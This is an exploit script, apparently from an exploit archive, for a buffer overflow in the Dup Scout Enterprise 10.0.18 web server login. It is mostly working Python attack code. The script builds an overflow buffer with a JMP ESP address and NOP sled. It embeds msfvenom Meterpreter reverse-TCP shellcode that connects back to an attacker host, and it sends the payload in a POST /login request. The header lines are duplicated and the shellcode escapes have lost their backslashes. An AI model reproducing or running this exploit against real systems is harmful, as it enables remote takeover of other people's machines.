Dup Scout Enterprise 10.0.18 Buffer Overflow

# Tested on Windows 10 (x86)
# The application requires to have the web server enabled.
# Exploit for older version: https://www.exploit-db.com/exploits/40832/

#!/usr/bin/python # Tested on Windows 10 (x86)
# The application requires to have the web server enabled.
# Exploit for older version: https://www.exploit-db.com/exploits/40832/

#!/usr/bin/python

import socket,os,time,struct,argparse

parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()

host = args.host
port = 80

# root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.116.166 LPORT=4455 -b "x00x0ax0dx25x26x2bx3d" -f py
shellcode = ""
shellcode += "xbaxb6x9fx39x88xd9xf7xd9x74x24xf4x5ex31"
shellcode += "xc9xb1x54x83xeexfcx31x56x0fx03x56xb9x7d"
shellcode += "xccx74x2dx03x2fx85xadx64xb9x60x9cxa4xdd"
shellcode += "xe1x8ex14x95xa4x22xdexfbx5cxb1x92xd3x53"
shellcode += "x72x18x02x5dx83x31x76xfcx07x48xabxdex36"
shellcode += "x83xbex1fx7fxfex33x4dx28x74xe1x62x5dxc0"
shellcode += "x3ax08x2dxc4x3axedxe5xe7x6bxa0x7exbexab"
shellcode += "x42x53xcaxe5x5cxb0xf7xbcxd7x02x83x3ex3e"
shellcode += "x5bx6cxecx7fx54x9fxecxb8x52x40x9bxb0xa1"
shellcode += "xfdx9cx06xd8xd9x29x9dx7axa9x8ax79x7bx7e"
shellcode += "x4cx09x77xcbx1ax55x9bxcaxcfxedxa7x47xee"
shellcode += "x21x2ex13xd5xe5x6bxc7x74xbfxd1xa6x89xdf"
shellcode += "xbax17x2cxabx56x43x5dxf6x3exa0x6cx09xbe"
shellcode += "xaexe7x7ax8cx71x5cx15xbcxfax7axe2xc3xd0"
shellcode += "x3bx7cx3axdbx3bx54xf8x8fx6bxcex29xb0xe7"
shellcode += "x0exd6x65x9dx04x40x2ax72x6dx36x5ax71x8d"
shellcode += "x27xfcxfcx6bx17x52xafx23xd7x02x0fx94xbf"
shellcode += "x48x80xcbxdfx72x4ax64x75x9dx23xdcxe1x04"
shellcode += "x6ex96x90xc9xa4xd2x92x42x4dx22x5cxa3x24"
shellcode += "x30x88xd2xc6xc8x48x7fxc7xa2x4cx29x90x5a"
shellcode += "x4ex0cxd6xc4xb1x7bx64x02x4dxfax5dx78x7b"
shellcode += "x68xe2x16x83x7cxe2xe6xd5x16xe2x8ex81x42"
shellcode += "xb1xabxcex5exa5x67x5ax61x9cxd4xcdx09x22"
shellcode += "x02x39x96xddx61x3axd1x22xf7x1ex7ax4bx07"
shellcode += "x1ex7ax8bx6dx9ex2axe3x7axb1xc5xc3x83x18"
shellcode += "x8ex4bx09xccx7cxedx0exc5x21xb3x0fxe9xf9"
shellcode += "xa2x81x0exfexcax63x33x28xf3x11x74xe8x40"
shellcode += "x29xcfx4dxe0xa0x2fxc1xf2xe0"

buffer = "x41" * 780
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "x90" * 12
buffer += shellcode
buffer += "x90" * (10000 - len(buffer))

evil = "POST /login HTTP/1.1 "
evil += "Host: 192.168.228.140 "
evil += "User-Agent: Mozilla/5.0 "
evil += "Connection: close "
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "
evil += "Accept-Language: en-us,en;q=0.5 "
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 "
evil += "Keep-Alive: 300 "
evil += "Proxy-Connection: keep-alive "
evil += "Content-Type: application/x-www-form-urlencoded "
evil += "Content-Length: 17000 "
evil += "username=" + buffer
evil += "&password=" + buffer + " "

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()